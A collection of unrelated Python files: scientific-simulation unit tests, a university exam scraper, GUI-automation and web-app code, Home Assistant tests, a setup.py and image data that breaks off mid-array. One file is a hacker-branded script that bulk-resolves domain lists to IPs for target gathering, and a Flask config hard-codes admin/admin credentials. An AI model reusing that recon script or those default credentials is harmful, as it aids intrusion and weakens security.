# Update current position
KratosMultiphysics.VariableUtils().UpdateCurrentPosition(model_part.Nodes)
# Check current position
for node in model_part.Nodes:
self.assertAlmostEqual(node.X, node.X0 + float(node.Id))
self.assertAlmostEqual(node.Y, node.Y0 + 1.5 * float(node.Id))
self.assertAlmostEqual(node.Z, node.Z0 + 2.0 * float(node.Id))
# Set a fake displacement field in another variable
for node in model_part.Nodes:
aux_disp = KratosMultiphysics.Vector(3)
aux_disp[0] = 3.0 * float(node.Id)
aux_disp[1] = 4.0 * float(node.Id)
aux_disp[2] = 5.0 * float(node.Id)
node.SetSolutionStepValue(KratosMultiphysics.MESH_DISPLACEMENT, aux_disp)
# Update current position using an alternative variable
KratosMultiphysics.VariableUtils().UpdateCurrentPosition(model_part.Nodes, KratosMultiphysics.MESH_DISPLACEMENT)
# Check current position
for node in model_part.Nodes:
self.assertAlmostEqual(node.X, node.X0 + 3.0 * float(node.Id))
self.assertAlmostEqual(node.Y, node.Y0 + 4.0 * float(node.Id))
self.assertAlmostEqual(node.Z, node.Z0 + 5.0 * float(node.Id))
def test_distribute_condition_variable(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
for node in model_part.Nodes:
node.SetValue(KratosMultiphysics.AUX_MESH_VAR, node.Id)
for condition in model_part.Conditions:
condition.SetValue(KratosMultiphysics.DISTANCE, condition.Id)
vector = KratosMultiphysics.Vector(3)
vector[0] = condition.Id * 3
vector[1] = condition.Id * 3 + 1
vector[2] = condition.Id * 3 + 2
condition.SetValue(KratosMultiphysics.VELOCITY, vector)
variable_utils = KratosMultiphysics.VariableUtils()
variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.DISTANCE, KratosMultiphysics.AUX_MESH_VAR, False)
variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.VELOCITY, KratosMultiphysics.AUX_MESH_VAR, False)
distance_vector = [
1.0, 3602.0, 10803.0, 3643056.0, 3789835.0, 1897352.0
]
velocity_vector = [
3.0, 4.0, 5.0, 10806.0, 10810.0, 10814.0, 32409.0, 32415.0, 32421.0, 10929168.0, 10931112.0, 10933056.0, 11369505.0, 11371451.0, 11373397.0, 5692056.0, 5693030.0, 5694004.0
]
local_index = 0
for node in model_part.Nodes:
self.assertEqual(node.GetValue(KratosMultiphysics.DISTANCE), distance_vector[local_index])
self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY)[0], velocity_vector[local_index * 3])
self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY)[1], velocity_vector[local_index * 3 + 1])
self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY)[2], velocity_vector[local_index * 3 + 2])
local_index += 1
def test_distribute_condition_variable_inverse(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
for node in model_part.Nodes:
node.SetValue(KratosMultiphysics.AUX_MESH_VAR, 1.0 / node.Id)
for condition in model_part.Conditions:
condition.SetValue(KratosMultiphysics.DISTANCE, condition.Id)
vector = KratosMultiphysics.Vector(3)
vector[0] = condition.Id * 3
vector[1] = condition.Id * 3 + 1
vector[2] = condition.Id * 3 + 2
condition.SetValue(KratosMultiphysics.VELOCITY, vector)
variable_utils = KratosMultiphysics.VariableUtils()
variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.DISTANCE, KratosMultiphysics.AUX_MESH_VAR, True)
variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.VELOCITY, KratosMultiphysics.AUX_MESH_VAR, True)
distance_vector = [
1.0, 3602.0, 10803.0, 3643056.0, 3789835.0, 1897352.0
]
velocity_vector = [
3.0, 4.0, 5.0, 10806.0, 10810.0, 10814.0, 32409.0, 32415.0, 32421.0, 10929168.0, 10931112.0, 10933056.0, 11369505.0, 11371451.0, 11373397.0, 5692056.0, 5693030.0, 5694004.0
]
local_index = 0
for node in model_part.Nodes:
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.DISTANCE), distance_vector[local_index])
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.VELOCITY)[0], velocity_vector[local_index * 3])
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.VELOCITY)[1], velocity_vector[local_index * 3 + 1])
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.VELOCITY)[2], velocity_vector[local_index * 3 + 2])
local_index += 1
if __name__ == '__main__':
KratosMultiphysics.Logger.GetDefaultOutput().SetSeverity(KratosMultiphysics.Logger.Severity.WARNING)
KratosUnittest.main()
|
from collections import OrderedDict
from datetime import datetime
import requests
from bs4 import BeautifulSoup
from dateutil import parser
from data_parser.base_parser import BaseParser
from validations.schemas.exams_schema import ExamsSchema
def get_course_info(month, year, course_code):
season = course_code[-1]
endings = {
'dec': {
'F': f'{year}9',
'Y': f'{int(year) - 1}9'
},
'apr': {
'S': f'{year}1',
'Y': f'{int(year) - 1}9'
},
'jun': {
'F': f'{year}5F',
'Y': f'{year}5'
},
'jul': {
'S': f'{year}5S',
'Y': f'{year}5'
},
'aug': {
'S': f'{year}5S',
'Y': f'{year}5'
}
}
exam_id = course_id = None
month = month[:3].lower()
if month in endings and season in endings[month]:
course_id = f'{course_code}{endings[month][season]}'
exam_id = f'{course_id}{month.upper()}{year}'
return exam_id, course_id, course_code
# Currently only supports Art Sci at UTSG
class ExamsParser(BaseParser):
link_artsci = "https://www.artsci.utoronto.ca/current/faculty-registrar/exams/exam-schedule"
link_utm = "https://student.utm.utoronto.ca/examschedule/finalexams.php"
link_utsc = "https://www.utsc.utoronto.ca/registrar/examination-schedule"
def __init__(self):
super().__init__(
file="../nikel-datasets/data/exams.json",
update=True,
schema=ExamsSchema
)
@staticmethod
def process_building_code(code):
for idx, char in enumerate(code):
if char.isdigit():
return f"{code[:idx]} {code[idx:]}"
return code
def custom_mapping(self, title, fields):
fields = [field.text.strip() for field in fields]
if title == "June 2019":
return [fields[0], fields[1], fields[2], f"{fields[3]} {fields[4]}", fields[5], fields[6], fields[7]]
elif title == "August 2019":
return [fields[0], fields[1], fields[2], self.process_building_code(fields[3]), fields[4], fields[5],
fields[6]]
elif title == "December 2019":
return [fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6]]
else:
return [fields[0], fields[1], fields[2], None, fields[3], fields[4], fields[5]]
def process_utsg(self):
# Art Sci at UTSG
page = requests.get(ExamsParser.link_artsci)
parsed_page = BeautifulSoup(page.content, "lxml")
terms = parsed_page.find_all("div", {"class": "panel panel-default"})
for term in terms:
title = term.find("a", {"class": "accordion-panel-h4-a"}).text
if title == "Locations":
continue
month, year = title.split(" ")
rows = term.find_all("tr")
for row in rows[1:]:
fields = self.custom_mapping(title, row.find_all("td"))
exam_id, course_id, course_code = get_course_info(month, year, fields[0])
if exam_id in self.data:
split_exists = False
for i in range(len(self.data[exam_id]["sections"])):
if fields[2] == self.data[exam_id]["sections"][i]["split"]:
split_exists = True
break
if not split_exists:
self.data[exam_id]["sections"].append(
{
"lecture_code": fields[1],
"split": fields[2],
"location": fields[3]
}
)
else:
if fields[4] == "Decemberc 10":
exam_date = datetime(
year=2000,
month=12,
day=10
)
else:
exam_date = parser.parse(fields[4])
date = datetime.now()
start_time = parser.parse(fields[5])
start_secs = (start_time - start_time.replace(hour=0, minute=0, second=0,
microsecond=0)).total_seconds()
end_time = parser.parse(fields[6])
end_secs = (end_time - end_time.replace(hour=0, minute=0, second=0,
microsecond=0)).total_seconds()
duration = end_secs - start_secs
exam = OrderedDict([
("id", exam_id),
("course_id", course_id),
("course_code", course_code),
("campus", "St. George"),
("date", f'{year}-{exam_date.strftime("%m-%d")}'),
("start", int(start_secs)),
("end", int(end_secs)),
("duration", int(duration)),
("sections", [{
"lecture_code": fields[1],
"split": fields[2],
"location": fields[3]
}]),
("last_updated", date.isoformat())
])
self.add_item(exam)
def process_utm(self):
page = requests.get(ExamsParser.link_utm)
parsed_page = BeautifulSoup(page.content, "lxml")
# month, year = parsed_page.find("h1").text.split()[:2]
month, year = ["July", "2020"]
rows = parsed_page.find_all("tr")
for row in rows[1:]:
fields = [field.text.strip() for field in row.find_all("td")]
exam_id, course_id, course_code = get_course_info(month, year, fields[0])
exam_date = parser.parse(fields[2])
start_time = parser.parse(fields[4])
start_secs = (start_time - start_time.replace(hour=0, minute=0, second=0,
microsecond=0)).total_seconds()
end_time = parser.parse(fields[5])
end_secs = (end_time - end_time.replace(hour=0, minute=0, second=0,
microsecond=0)).total_seconds()
duration = end_secs - start_secs
date = datetime.now()
exam = OrderedDict([
("id", exam_id),
("course_id", course_id),
("course_code", course_code),
("campus", "Mississauga"),
("date", f'{year}-{exam_date.strftime("%m-%d")}'),
("start", int(start_secs)),
("end", int(end_secs)),
("duration", int(duration)),
("sections", []),
("last_updated", date.isoformat())
])
self.add_item(exam)
def process_utsc(self):
page = requests.get(ExamsParser.link_utsc)
parsed_page = BeautifulSoup(page.content, "lxml")
month, year = parsed_page.find("h2", {"class": "block-title"}).text.split()[:2]
rows = parsed_page.find_all("tr", {"class": ["odd", "even"]})
for row in rows:
fields = [field.text.strip() for field in row.find_all("td")]
course_code = fields[0].split()[0]
exam_id, course_id, course_code = get_course_info(month, year, course_code)
if exam_id is None:
break
exam_date = parser.parse(fields[1])
try:
start_time = parser.parse(fields[2])
start_secs = (start_time - start_time.replace(hour=0, minute=0, second=0,
microsecond=0)).total_seconds()
except:
start_time = None
start_secs = 0
date = datetime.now()
if fields[3] == "3:00 +1" or fields[3] == "9:00 +1":
end_time = start_time
else:
end_time = parser.parse(fields[3])
end_secs = (end_time - end_time.replace(hour=0, minute=0, second=0,
microsecond=0)).total_seconds()
duration = end_secs - start_secs
if duration == 0:
duration = 3600 * 24
exam = OrderedDict([
("id", exam_id),
("course_id", course_id),
("course_code", course_code),
("campus", "Scarborough"),
("date", f'{year}-{exam_date.strftime("%m-%d")}'),
("start", int(start_secs)),
("end", int(end_secs)),
("duration", int(duration)),
("sections", []),
("last_updated", date.isoformat())
])
self.add_item(exam)
@staticmethod
def process_field(page, id: str):
field = page.find("span", id=id)
if field:
field = field.text.strip()
return field
if __name__ == "__main__":
p = ExamsParser()
p.load_file()
p.process_utsg()
p.process_utm()
p.process_utsc()
p.dump_file()
p.thread_print(f"Validating {p.file}...")
p.validate_dump()
|
from . import utils
from .asset import *
from .category import *
from .channel import *
from .client import *
from .embed import *
from .enums import *
from .errors import *
from .file import *
from .flags import *
from .invite import *
from .member import *
from .message import *
from .messageable import *
from .permissions import *
from .role import *
from .server import *
from .user import *
__version__ = (0, 1, 7)
|
from enum import Enum
from typing import Optional, Any
from System import InvalidOperationException # pylint: disable=import-error
from FlaUILibrary.flaui.exception import FlaUiError
from FlaUILibrary.flaui.interface import (ModuleInterface, ValueContainer)
from FlaUILibrary.flaui.util.converter import Converter
class Selector(ModuleInterface):
"""
List control module wrapper for FlaUI usage.
Wrapper module executes methods from ComboBox.cs and ListBox.cs implementation.
https://docs.microsoft.com/de-de/dotnet/api/system.windows.controls.primitives.selector?view=net-5.0
"""
class Container(ValueContainer):
"""
Value container from selector module.
"""
index: Optional[int]
name: Optional[str]
element: Optional[Any]
class Action(Enum):
"""Supported actions for execute action implementation."""
SELECT_ITEM_BY_INDEX = "SELECT_ITEM_BY_INDEX"
SELECT_ITEM_BY_NAME = "SELECT_ITEM_BY_NAME"
SHOULD_CONTAIN = "SHOULD_CONTAIN"
GET_ITEMS_COUNT = "GET_ITEMS_COUNT"
GET_ALL_NAMES_FROM_SELECTION = "GET_ALL_NAMES_FROM_SELECTION"
SHOULD_HAVE_SELECTED_ITEM = "SHOULD_HAVE_SELECTED_ITEM"
GET_SELECTED_ITEMS = "GET_SELECTED_ITEMS"
@staticmethod
def create_value_container(element=None, index=None, name=None, msg=None):
"""
Helper to create container object.
Raises:
FlaUiError: If creation from container object failed by invalid values.
Args:
element (Object): ListBox or Combobox elements.
index (Number): Number to select from element
name (String): Name from element to select
msg (String): Optional error message
"""
return Selector.Container(name=Converter.cast_to_string(name),
element=None if not element else element,
index=Converter.cast_to_int(index, msg))
def execute_action(self, action: Action, values: Container):
"""If action is not supported an ActionNotSupported error will be raised.
Supported actions for checkbox usages are:
* Action.SELECT_ITEM_BY_INDEX
* values ["element", "index"]
* Returns : None
* Action.SELECT_ITEM_BY_NAME
* values ["element", "name"]
* Returns : None
* Action.SHOULD_CONTAIN
* values ["element", "name"]
* Returns : None
* Action.GET_ITEMS_COUNT
* values ["element"]
* Returns : None
* Action.GET_ALL_NAMES_FROM_SELECTION
* values ["element"]
* Returns : None
* Action.SHOULD_HAVE_SELECTED_ITEM
* values ["element", "name"]
* Returns : None
* Action.GET_SELECTED_ITEMS
* values ["element"]
* Returns : String from all selected items.
Raises:
FlaUiError: If action is not supported.
Args:
action (Action): Action to use.
values (Object): See action definitions for value usage.
"""
switcher = {
self.Action.SELECT_ITEM_BY_INDEX:
lambda: self._select_by_index(values["element"], values["index"]),
self.Action.SELECT_ITEM_BY_NAME:
lambda: self._select_by_name(values["element"], values["name"]),
self.Action.SHOULD_CONTAIN:
lambda: self._should_contain(values["element"], values["name"]),
self.Action.GET_ITEMS_COUNT:
lambda: values["element"].Items.Length,
self.Action.GET_ALL_NAMES_FROM_SELECTION:
lambda: self._get_all_selected_names(values["element"]),
self.Action.SHOULD_HAVE_SELECTED_ITEM:
lambda: self._should_have_selected_item(values["element"], values["name"]),
self.Action.GET_SELECTED_ITEMS:
lambda: self._get_selected_items(values["element"])
}
return switcher.get(action, lambda: FlaUiError.raise_fla_ui_error(FlaUiError.ActionNotSupported))()
@staticmethod
def _get_selected_items(element: Any):
"""
Try to get all selected items as string.
Args:
element (Object): List view to select items.
Returns:
String from all selected items separated as pipe for example:
Value 1
Value 2
"""
values = ""
for selected_item in element.SelectedItems:
values += selected_item.Text + "\n"
return values
@staticmethod
def _select_by_index(element: Any, index: int):
"""
Try to select element from given index.
Args:
element (Object): List control UI object.
index (Number): Index number to select
Raises:
FlaUiError: By an array out of bound exception
FlaUiError: If value is not a number.
"""
try:
element.Items[int(index)].Select()
except IndexError:
raise FlaUiError(FlaUiError.ArrayOutOfBoundException.format(index)) from None
except ValueError:
raise FlaUiError(FlaUiError.ValueShouldBeANumber.format(index)) from None
@staticmethod
def _select_by_name(element: Any, name: str):
"""
Try to select element from given name.
Args:
element (Object): List control UI object.
name (String): Name from item to select
Raises:
FlaUiError: If value can not be found by element.
"""
try:
element.Select(name)
except InvalidOperationException:
raise FlaUiError(FlaUiError.ElementNameNotFound.format(name)) from None
@staticmethod
def _should_have_selected_item(control: Any, item: Any):
"""
Verification if specific items are selected.
Args:
control (Object): List control UI object.
item (String): Item name which should be selected.
Raises:
FlaUiError: By an array out of bound exception
FlaUiError: If value is not a number.
"""
names = Selector._get_all_selected_names(control)
if item not in names:
raise FlaUiError(FlaUiError.ItemNotSelected.format(item))
@staticmethod
def _get_all_selected_names(control: Any):
"""
Get all selected names.
Args:
control (Object): List control element from FlaUI.
Returns:
List from all names from list control if exists otherwise empty list.
"""
names = []
for selected_item in control.SelectedItems:
names.append(selected_item.Name)
return names
@staticmethod
def _should_contain(control: Any, name: str):
"""
Checks if Listbox contains an given item by name.
Args:
control (Object): List control element from FlaUI.
name (String): Name from combobox item which should exist.
Returns:
True if name from combobox item exists otherwise False.
"""
for item in control.Items:
if item.Name == name:
return
raise FlaUiError(FlaUiError.ControlDoesNotContainItem.format(name))
|
import sys,os,re,socket,binascii,time,json,random,threading,Queue,pprint,urlparse,smtplib,telnetlib,os.path,hashlib,string,urllib2,glob,sqlite3,urllib,argparse,marshal,base64,colorama,requests
from colorama import *
from random import choice
from colorama import Fore,Back,init
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from platform import system
from Queue import Queue
from time import strftime
from urlparse import urlparse
from urllib2 import urlopen
colorama.init()
#Credit to Mister Spy
# Now regular ANSI codes should work, even in Windows
CLEAR_SCREEN = '\033[2J'
RED = '\033[31m' # mode 31 = red forground
RESET = '\033[0m' # mode 0 = reset
BLUE = "\033[34m"
CYAN = "\033[36m"
GREEN = "\033[32m"
RESET = "\033[0m"
BOLD = "\033[m"
REVERSE = "\033[m"
def logo():
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37 ]
x = """
____ _ ___ _ _
| _ \ ___ _ __ ___ __ _(_)_ __ |_ _|_ __ __ _ _ __ __ _| |__ | |__ ___ _ __
| | | |/ _ \| '_ ` _ \ / _` | | '_ \ | || '_ \ / _` | '__/ _` | '_ \| '_ \ / _ \ '__|
| |_| | (_) | | | | | | (_| | | | | || || |_) | (_| | | | (_| | |_) | |_) | __/ |
|____/ \___/|_| |_| |_|\__,_|_|_| |_|___| .__/ \__, |_| \__,_|_.__/|_.__/ \___|_|
|_| |___/
Note : Domaine List Shoud Be Without http://
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
logo()
def getIP(site):
site = i.strip()
try:
if 'http://' not in site:
IP1 = socket.gethostbyname(site)
print "IP: "+IP1
open('ips.txt', 'a').write(IP1+'\n')
elif 'http://' in site:
url = site.replace('http://', '').replace('https://', '').replace('/', '')
IP2 = socket.gethostbyname(url)
print "IP: "+IP2
open('IP_grabber_from_domain/ips.txt', 'a').write(IP2+'\n')
except:
pass
nam=raw_input('Domain List name :')
with open(nam) as f:
for i in f:
getIP(i)
|
import os, logging
# ----- LOGGING ----- #
DEBUG = True
LOG_FILE = 'logfile.log'
# 1 DEBUG - detailed info
# 2 INFO - confirmation that things according to plan
# 3 WARNING - something unexpected
# 4 ERROR - some function failed
# 5 CRITICAL - application failure
LOG_LEVEL = logging.DEBUG
logging.basicConfig(filename = LOG_FILE,
level = LOG_LEVEL)
# Adds console print
logging.getLogger().addHandler(logging.StreamHandler())
# ----- LOGGING ENDS ----- #
# ----- COOKIE ----- #
COOKEY_FILE = 'COOKEY.key'
with open(COOKEY_FILE) as r:
SECRET_KEY = r.read() #Reads key from file
# ----- COOKIE ENDS ----- #
# ----- U2F ----- #
U2F_APPID = 'https://localhost:5000'
# Set to True to enable facets
U2F_FACETS_ENABLED = False
U2F_FACETS_LIST = [
'https://localhost:5000'
]
# ----- U2F ENDS ----- #
# ----- DATABASES ----- #
DATABASE = 'flaskr.db'
USERNAME = 'admin'
PASSWORD = 'admin'
# defines the full path for the database
BASEDIR = os.path.abspath(os.path.dirname(__file__))
DATABASE_PATH = os.path.join(BASEDIR, DATABASE)
# the database uri
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + DATABASE_PATH
SQLALCHEMY_TRACK_MODIFICATIONS = False
# ----- DATABASES ENDS ----- #
|
from django.contrib.auth.models import User
from django.shortcuts import render
from .models import Message
from .forms import MessageForm
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.views.generic.edit import UpdateView, DeleteView
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
@login_required
def index(request):
"""
displays the main page of the messaging system
:param request: Self explanatory
:return: render containing the html page and all the messages for the user
"""
messages = Message.objects.filter(recipient=request.user).order_by('date').reverse()
return render(request, "messages_main.html", {'messages': messages})
@login_required
def createMessage(request):
"""
Creates a message that can be sent to other users
:param request: Self explanatory
:return: render containing the html page and the info needed for the message to be sent
"""
if request.method == 'POST':
message_form = MessageForm(request.POST)
if message_form.is_valid():
message = message_form.save(commit=False)
message.date = timezone.now()
message.sender = request.user
message_form.save()
return HttpResponseRedirect(reverse_lazy('messages_home'))
else:
message_form = MessageForm()
message_form.fields['recipient'].queryset=User.objects.all().exclude(pk=request.user.id)
return render(request, 'messages_create.html', {'message_form': message_form})
class UpdateMessage(LoginRequiredMixin, UpdateView):
"""
Allows for messages to be edited
"""
model = Message
template_name = 'messages_edit.html'
form_class = MessageForm
success_url = reverse_lazy('messages_home')
class DeleteMessage(LoginRequiredMixin, DeleteView):
"""
Allows for messages to be deleted
"""
model = Message
template_name = 'messages_delete.html'
success_url = reverse_lazy('messages_home')
|
"""Define tests for the GeoNet NZ Quakes config flow."""
from datetime import timedelta
from asynctest import CoroutineMock, patch
import pytest
from homeassistant import data_entry_flow
from homeassistant.components.geonetnz_quakes import (
CONF_MINIMUM_MAGNITUDE,
CONF_MMI,
DOMAIN,
FEED,
async_setup_entry,
async_unload_entry,
config_flow,
)
from homeassistant.const import (
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
CONF_SCAN_INTERVAL,
CONF_UNIT_SYSTEM,
)
from tests.common import MockConfigEntry
@pytest.fixture
def config_entry():
"""Create a mock GeoNet NZ Quakes config entry."""
return MockConfigEntry(
domain=DOMAIN,
data={
CONF_LATITUDE: -41.2,
CONF_LONGITUDE: 174.7,
CONF_RADIUS: 25,
CONF_UNIT_SYSTEM: "metric",
CONF_SCAN_INTERVAL: 300.0,
CONF_MMI: 4,
CONF_MINIMUM_MAGNITUDE: 0.0,
},
title="-41.2, 174.7",
)
async def test_duplicate_error(hass, config_entry):
"""Test that errors are shown when duplicates are added."""
conf = {CONF_LATITUDE: -41.2, CONF_LONGITUDE: 174.7, CONF_RADIUS: 25}
config_entry.add_to_hass(hass)
flow = config_flow.GeonetnzQuakesFlowHandler()
flow.hass = hass
result = await flow.async_step_user(user_input=conf)
assert result["errors"] == {"base": "identifier_exists"}
async def test_show_form(hass):
"""Test that the form is served with no input."""
flow = config_flow.GeonetnzQuakesFlowHandler()
flow.hass = hass
result = await flow.async_step_user(user_input=None)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
async def test_step_import(hass):
"""Test that the import step works."""
conf = {
CONF_LATITUDE: -41.2,
CONF_LONGITUDE: 174.7,
CONF_RADIUS: 25,
CONF_UNIT_SYSTEM: "metric",
CONF_MMI: 2,
CONF_SCAN_INTERVAL: timedelta(minutes=4),
CONF_MINIMUM_MAGNITUDE: 2.5,
}
flow = config_flow.GeonetnzQuakesFlowHandler()
flow.hass = hass
result = await flow.async_step_import(import_config=conf)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "-41.2, 174.7"
assert result["data"] == {
CONF_LATITUDE: -41.2,
CONF_LONGITUDE: 174.7,
CONF_RADIUS: 25,
CONF_MMI: 2,
CONF_UNIT_SYSTEM: "metric",
CONF_SCAN_INTERVAL: 240.0,
CONF_MINIMUM_MAGNITUDE: 2.5,
}
async def test_step_user(hass):
"""Test that the user step works."""
hass.config.latitude = -41.2
hass.config.longitude = 174.7
conf = {CONF_RADIUS: 25, CONF_MMI: 4}
flow = config_flow.GeonetnzQuakesFlowHandler()
flow.hass = hass
result = await flow.async_step_user(user_input=conf)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "-41.2, 174.7"
assert result["data"] == {
CONF_LATITUDE: -41.2,
CONF_LONGITUDE: 174.7,
CONF_RADIUS: 25,
CONF_MMI: 4,
CONF_UNIT_SYSTEM: "metric",
CONF_SCAN_INTERVAL: 300.0,
CONF_MINIMUM_MAGNITUDE: 0.0,
}
async def test_component_unload_config_entry(hass, config_entry):
"""Test that loading and unloading of a config entry works."""
config_entry.add_to_hass(hass)
with patch(
"aio_geojson_geonetnz_quakes.GeonetnzQuakesFeedManager.update",
new_callable=CoroutineMock,
) as mock_feed_manager_update:
# Load config entry.
assert await async_setup_entry(hass, config_entry)
await hass.async_block_till_done()
assert mock_feed_manager_update.call_count == 1
assert hass.data[DOMAIN][FEED][config_entry.entry_id] is not None
# Unload config entry.
assert await async_unload_entry(hass, config_entry)
await hass.async_block_till_done()
assert hass.data[DOMAIN][FEED].get(config_entry.entry_id) is None
|
def foo(a, b): a<caret>.
|
from setuptools import *
desc = """
Overview
=====
 [](https://webchat.freenode.net/) [](http://twitter.com/cofferproject)
A lightweight platform for creating isolated and portable development environments.
Requirements
============
- Python 3
- Linux or MacOS
Quick Start
===========
`pip install coffer-container`
What is Coffer?
===============
Before I talk about what Coffer is, let me say what Coffer is *not*. Coffer is not a replacement for Docker. In fact, if you are looking for a completely isolated container
you're probably better off using Docker, or some other container software. Coffer is also not intended to be used as a secure means by which to isolate an application, and
it is recommended that Coffer not be used outside of a development setting.
Coffer is a platform for creating isolated filesystem containers. It is intended to be used to create isolated development environments without having to worry about doing any network configuration.
Applications that are run in Coffer can be accessed outside of a Coffer environment through `localhost` without having to do anything more than `coffer create <name>`.
This makes it easy to get environments up and running for those of us who do not need network isolation, and only wish to islolate an app and its dependencies.
Coffer makes it easy to create, enter, and share environments with others.
What are some features of Coffer?
=================================
- Create isolated file system containers
- Use Coffer templates to automatically install and configure a container
- Share containers and templates with a team to replicate an environment
- Does not isolate network, so there is no extra configuring that needs to be done
- Creating an environment is as easy as executing `coffer create <name of environment>`
How can I get started?
======================
1. Clone this repo
2. Run `setup.py`
3. In a terminal execute `coffer create first_env`
4. Then `coffer enter first_env`
Then like that you have created your first environment! For more extensive getting started docs, read our [Getting Started](https://github.com/Max00355/Coffer/blob/master/docs/GettingStarted.md) docs.
Current Status
==============
Coffer is under very heavy development, and receiving frequent updates. The code in the `master` branch is considered the most stable, and in it's current state Coffer is ready for actual use.
In fact, Coffer development is happening in a Coffer container as of right now. If there are any bugs, please create issues about them.
"""
kwargs = {
"author" : "Frankie Primerano",
"author_email" : "frankieprimerano@gmail.com",
"description" : "A lightweight platform for creating isolated and portable development environments",
"entry_points" : {"console_scripts" : ["coffer=coffer.coffer:checkArgs"]},
"name" : "coffer-container",
"packages" : ["coffer", "coffer.utils"],
"version" : "1.3.2",
"url":"https://github.com/Max00355/Coffer",
"keywords":"container coffer docker vm virtualenv",
"license":"MIT",
"long_description":desc,
}
setup(**kwargs)
|
import os
import boto3
s3_client = boto3.client('s3')
s3_bucket = "aiworkflow"
training_dataset = "sim_data"
training_files = os.listdir(training_dataset+"/IMG/")
for file in training_files:
file_name = training_dataset+"/IMG/"+file
object_name = training_dataset+"_"+file
print(object_name)
s3_client.upload_file(file_name, s3_bucket, object_name)
|
##
# @filename : imagedata.py
# @brief : data file for epd demo
#
# Copyright (C) Waveshare August 16 2017
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documnetation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS OR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
MONOCOLOR_BITMAP = [ # 0X00,0X01,0X80,0X02,0X80,0X01, #
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
